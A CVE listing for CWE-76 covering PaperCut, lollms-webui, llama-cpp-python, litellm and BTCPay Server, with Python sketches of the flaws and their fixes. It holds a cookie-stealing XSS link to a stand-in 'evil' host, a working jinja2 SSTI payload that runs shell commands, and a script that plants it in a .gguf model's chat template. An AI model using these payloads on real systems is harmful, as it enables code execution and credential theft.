Vulnerabilities (CVE)

Filtered by CWE-76 (Improper Neutralization of Equivalent Special Elements)
Total: 7 CVEs
CVE-2024-1883 | Updated: 2024-09-26 | CVSS v2: N/A | CVSS v3: 6.3 MEDIUM
This is a reflected cross-site scripting (XSS) vulnerability in the PaperCut NG/MF application server. An attacker can exploit this weakness by crafting a malicious URL that contains a script. When an unsuspecting user clicks the link, the script executes in their browser, potentially leading to limited loss of confidentiality, integrity, or availability.
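As a generic illustration of the reflected-XSS pattern described above (a minimal Flask sketch, not PaperCut's code; the route and parameter names are hypothetical):

```python
# Generic reflected-XSS sketch, assuming Flask; the route and parameter are
# hypothetical and this is not PaperCut's code.
from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)

@app.route("/search")
def search():
    q = request.args.get("q", "")
    # Vulnerable: the parameter is echoed into HTML unencoded, so a link like
    #   https://host/search?q=<script>fetch('//evil/c?'+document.cookie)</script>
    # executes in the victim's browser when clicked.
    return f"<p>Results for {q}</p>"

@app.route("/search-safe")
def search_safe():
    q = request.args.get("q", "")
    # Fixed: HTML-encode untrusted input before reflecting it into the page.
    return f"<p>Results for {escape(q)}</p>"
```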
CVE-2024-1882 | Updated: 2024-09-26 | CVSS v2: N/A | CVSS v3: 7.2 HIGH
This vulnerability allows an already authenticated admin user to craft a malicious payload that can be leveraged for remote code execution on the host running the PaperCut NG/MF application server.
CVE-2024-1221 | Updated: 2024-09-26 | CVSS v2: N/A | CVSS v3: 3.1 LOW
This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specially crafted payload against the affected API endpoint. The attacker must first carry out reconnaissance to obtain a system token. This CVE only affects Linux and macOS PaperCut NG/MF servers.
CVE-2024-4897 | Updated: 2024-07-02 | CVSS v2: N/A | CVSS v3: 8.4 HIGH
parisneo/lollms-webui, in its latest version, is vulnerable to remote code execution due to an insecure dependency on llama-cpp-python version llama_cpp_python-0.2.61+cpuavx2-cp311-cp311-manylinux_2_31_x86_64. The vulnerability arises from the application's 'bindings_zoo' feature, which allows attackers to upload and interact with a malicious model file hosted on Hugging Face, leading to remote code execution. The issue stems from a known vulnerability in llama-cpp-python, CVE-2024-34359, which has not been patched in lollms-webui as of commit b454f40a. It is exploitable through the application's handling of model files in the 'bindings_zoo' feature, specifically when processing `.gguf`-format model files, as sketched below.
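A hedged sketch of where such a payload lives in a model file, using the `gguf` package from the llama.cpp project (`pip install gguf`). The template value is the SSTI payload that CVE-2024-34359 (below) describes; a file llama.cpp would actually load also needs tensors and per-architecture metadata, which this sketch omits:

```python
# Sketch only: embeds a hostile chat template into .gguf metadata with the
# gguf-py writer. This illustrates the tokenizer.chat_template key being set;
# it does not produce a complete, loadable model.
from gguf import GGUFWriter

# The jinja2 SSTI payload described under CVE-2024-34359 below.
ssti_payload = "{{ cycler.__init__.__globals__.os.popen('id').read() }}"

writer = GGUFWriter("malicious.gguf", arch="llama")
writer.add_chat_template(ssti_payload)  # stored under tokenizer.chat_template
writer.write_header_to_file()
writer.write_kv_data_to_file()
writer.write_tensors_to_file()
writer.close()
```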
CVE-2024-34359 | Updated: 2024-05-14 | CVSS v2: N/A | CVSS v3: 9.6 CRITICAL
llama-cpp-python provides the Python bindings for llama.cpp. `llama-cpp-python` depends on the `Llama` class in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning models. The `__init__` constructor of `Llama` takes several parameters to configure the loading and running of the model. Besides NUMA, LoRA settings, tokenizer loading, and hardware settings, `__init__` also loads the chat template from the targeted `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for the model. However, `Jinja2ChatFormatter` parses the chat template from the metadata with a sandbox-less `jinja2.Environment`, which is later rendered in `__call__` to construct the prompt for each interaction. This permits jinja2 server-side template injection (SSTI), leading to remote code execution via a carefully constructed payload.
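A minimal sketch of why the sandbox-less environment is the root cause: the snippet below renders a canonical jinja2 SSTI gadget with both `jinja2.Environment` and `jinja2.sandbox.SandboxedEnvironment`. The template string stands in for attacker-controlled `.gguf` metadata; this is illustrative, not llama-cpp-python's actual code.

```python
# Illustrative only, not llama-cpp-python code. The template is the
# well-known jinja2 SSTI gadget that reaches `os` through the module
# globals of the built-in `cycler` helper.
import jinja2
from jinja2.sandbox import SandboxedEnvironment

# Stand-in for an attacker-controlled chat template read from .gguf metadata.
malicious_template = "{{ cycler.__init__.__globals__.os.popen('id').read() }}"

# Vulnerable pattern: a sandbox-less Environment allows arbitrary attribute
# traversal, so rendering runs `id` on the host.
print(jinja2.Environment().from_string(malicious_template).render())

# Mitigated pattern: a sandboxed environment rejects the dunder access.
try:
    SandboxedEnvironment().from_string(malicious_template).render()
except jinja2.exceptions.SecurityError as exc:
    print("blocked:", exc)
```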
CVE-2024-2952 | Updated: 2024-04-15 | CVSS v2: N/A | CVSS v3: 9.8 CRITICAL
BerriAI/litellm is vulnerable to Server-Side Template Injection (SSTI) via the `/completions` endpoint. The vulnerability arises from the `hf_chat_template` method processing the `chat_template` parameter from the `tokenizer_config.json` file through the Jinja template engine without proper sanitization. Attackers can exploit this by crafting malicious `tokenizer_config.json` files that execute arbitrary code on the server.
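The same class of payload applies here. A minimal sketch of the vulnerable pattern with a hypothetical `tokenizer_config.json` (this is not litellm's actual `hf_chat_template` implementation):

```python
# Hypothetical sketch, not litellm's code: a chat_template taken from a model
# repo's tokenizer_config.json is rendered by Jinja without sanitization.
import json
import jinja2

# Attacker-controlled file shipped alongside a malicious model.
tokenizer_config = json.loads(
    '{"chat_template": '
    '"{{ cycler.__init__.__globals__.os.popen(\'id\').read() }}"}'
)

# Rendering the untrusted template server-side executes the payload.
print(jinja2.Environment()
      .from_string(tokenizer_config["chat_template"])
      .render(messages=[]))
```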
CVE-2023-1149 | Vendor: Btcpayserver | Product: Btcpay Server | Updated: 2024-02-28 | CVSS v2: N/A | CVSS v3: 5.4 MEDIUM
Improper Neutralization of Equivalent Special Elements (CWE-76) in the GitHub repository btcpayserver/btcpayserver prior to version 1.8.0.